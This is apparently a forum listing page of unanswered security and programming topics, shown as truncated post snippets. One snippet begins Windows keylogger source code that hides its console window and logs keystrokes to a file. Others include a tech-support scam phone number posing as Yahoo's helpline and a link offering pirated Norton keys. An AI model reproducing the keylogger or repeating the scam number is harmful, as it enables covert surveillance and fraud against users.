49 Unanswered Topics

Remove Filter
Member Avatar for
Member Avatar for riyajohnson70

Greetings, fellow crypto enthusiasts! In the world of cryptocurrency, security is paramount. Whether you're a seasoned trader or just getting started, protecting your digital assets should be your top priority. To help you stay safe and secure, we've compiled a list of essential security tips for safeguarding your crypto wallets. …

0
28
Member Avatar for Bam_391

In today's digital age, businesses rely heavily on customer data to enhance their operations, personalize experiences, and drive growth. However, the increasing importance of customer data brings along significant cybersecurity challenges. Protecting this data is not only a legal and ethical obligation but also crucial for maintaining customer trust and …

1
96
Member Avatar for dwellfox
Member Avatar for kuldeeprana

As software development becomes more complex and fast-paced, test automation has become a crucial part of the development process. Automated testing can help software teams save time, reduce costs, and improve the overall quality of the product. However, not all tests are suitable for automation, and deciding which tests to …

-1
32
Member Avatar for golihoy278

#define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> #include<winuser.h> using namespace std; void stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); } ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { switch (p->vkCode) { …

0
63
Member Avatar for v.gangani

I have list of unique names of players in column A in sheet 1. And in sheet 2 I have data of cricket score of different matches for that particular player with same unique names. And in sheet 3 I have data of same players for football matches. Now I …

0
99
Member Avatar for Mr.M

Hi DW. Well I'm very much interested in the data protection and also giving the best privacy to the public where we protect your passwords. I've seen something that Firefox had introduced to their browsers with also their Apps. This is called LockWise which is a tool to sync your …

0
1K
Member Avatar for akkbkht

Hi, I am trying to disable a forwarder in a mailbox under exchange server 2010 on server 2008 R2 x64 on Hyper-V. When I try to remove the forwarded email in the mailbox and click on apply or OK, I receive error which says, "you must provide a value to …

0
218
Member Avatar for toxicandy

I have a question regarding user membership of groups in Active directory and grabbing such memberships with PHP. My big question/situation is that I have a site I am making and essentially I am trying to assign administrators based off of groups in Active directory and I know how to …

0
210
Member Avatar for ilyes222

Hello everybody i would like some worked on the field of **SQL test cases generation based mutation**. In fact i almost wrote the test cases mutation code and i generated mutated test cases. but now i want to validate thus inputs or test the mutation by verifiying the killed and …

0
301
Member Avatar for amit_4184

Hi I am desperatly struggling lot to configure SMTP using iis 6 on windows 2008 server . i am following same procedure as per below http://www.vsysad.com/2012/04/setup-and-configure-smtp-server-on-windows-server-2008-r2/ but unable to send any mails . can any one help me?

0
192
Member Avatar for Henry_6

Is Yahoo phone (O800-O86-8676) yahoo Technical Helpline Number for UK ? What on earth do I do? Monday Midday, a spam email was sent from my account to all my contacts. I could still log on, see my emails and send new emails but no incoming mails were reaching my …

0
174
Member Avatar for IntegratedTweak

CryptoWall 4.0 the newest ransomware to date is been spread by Angler Exploit Kits. A new drive-by download campaign is to blame for this attack. Heimdal was the first to discover the malware nearly one month ago. It's also more stealthier than previous versions and also a lot stronger. This …

0
360
Member Avatar for shany0786

I am have debugging some javascript code in firebug,then i have seen some strange POST thing in firebug this is worrying me? I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post" Response Header Cache-Control no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection keep-alive Content-Type application/json Date …

0
189
Member Avatar for Whdms

Free Web Hosting with cPanel up to 1 GB for one year from WHDMS.COM Cart page :- https://goo.gl/f9boM9 Use Promo Code – FWH100 Features of Free Web Hosting by WHDMS.com: 1GB Free Space 100GB Data transfer and Bandwidth 5 E-mail contacts and FTP accounts 5 MYSQL accounts can be created …

0
266
Member Avatar for My_2

I found a document,which contains many key trial of Norton Internet Security. I tried on my computer and fell good with it. Let's try if you want and notifys to me your result. I'm so glad for this [Key NIS 2014 ~180 days](http://ouo.io/3Tqfa) the root website: https://sites.google.com/site/librarylinkvip/home/share-key-nis-2014

-1
176
Member Avatar for Ivan_8

Esteemed readers After updating multiple times a server with W2k8R2, the Security Update for .NET KB2894854 becomes available over and over again in WU (control panel). Apparantly it's installed 4.5.52022. Thanks for your time. Faithfully, Ivan

0
241
Member Avatar for squarethree

Do you notice that APPs are facing more and more risk of privacy leaks and security threats? As an APP developer, how do you improve the security and privacy of APP?

0
109
Member Avatar for ibrahimlita

using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Windows.Forms; namespace DBCsharp { class authentiction { public static int logged_user_id=0; public static bool CanAddUser = false; public static bool CanDeleteUser = false; public static TaregData db = new TaregData(); public static bool log_user(string username,string password) { var user = (from …

0
142
Member Avatar for danarashad

I am working on trying to secure some coldfusion servers. I've seen the lockdown guides all over the net. But those guides are for new installs. Is there a way to lockdown coldfusion after the install?

0
179
Member Avatar for mrabrar09

Hello Everyone, Already my web project is developed by using jsp and servlets now I would like to do security check on each and every pages. so, is there any software to check whether my all pages are robust and secure before deploying on to the live server. Eg: Like …

0
159
Member Avatar for shah112

hi , i am unable to solve this error , am running chukwa on single node so please guide me . The error am getting is shown below, hduser@bizruntime:/usr/share/chukwa/chukwa-0.4.0/bin$ ./start-all.sh cat: /usr/share/chukwa/chukwa-0.4.0/bin/../conf/collectors: No such file or directory cat: /usr/share/chukwa/chukwa-0.4.0/bin/../conf/agents: No such file or directory starting archive, logging to /usr/share/chukwa/chukwa-0.4.0/bin/../logs/chukwa-chukwa-archive-bizruntime.out starting …

0
160
Member Avatar for Pamilerin

Good Day, I am thinking of building a diary that has entries based on the dates of the year as inputed via a calendar/ date-time picker. Its security is in the fact that it can only be read from the program. Opening the original text is a different encoding. Based …

0
121
Member Avatar for filipgothic

hey, I need help with this code, I have made database and code for inserting data, now I need code that will display data for group, in database I have groupnaziv, and id, here is code for inserting which works great, after that I will post code that I need …

0
133
Member Avatar for sharlyx

hi daniweb, I'm trying to work on a project regarding building a data mining software using software security tools. the essence of the project to address the security issues in data mining software. can these two aspects really be combined? i also need help on the languages i could use …

0
121
Member Avatar for LukeJWhitworth

Hello, Can someone please point me in the right direction for using the Digital Persona Fingerprint system, the u.are.u 4500 one. I have imported the following statements; Imports GrFingerXLib Imports Microsoft.VisualBasic But then I don't know where to go from there. All I want to do is scan the fingerprint, …

0
144
Member Avatar for mallo

I'm very much interested to develop Network IDS for my final year project , but I'm beginner to this Network security domain.Need some suggestion and some resources to develop this project.please help me .

0
118
Member Avatar for pritaeas

We're looking into the Enterprise Library, to see if the security part will fit our needs. We want to use application roles/rights, so we probably need to write our own security provider. What I'm looking for are decent resources on this specific topic. I've found several books already on the …

0
160
Member Avatar for neetika800

what are the drawbacks of Implementing digital signature with RSA encryption algorithm to enhance the Data Security of cloud in Cloud Computing.

0
179
Member Avatar for pchurness

Hello, I'm developing an e-commerce site in a LAMP environment. Is it advisable to separate data on to different servers (i.e. to have one server as the web server and another server to house transaction and other customer data)? In other words, from a security perspective is there any reason …

0
134

The End.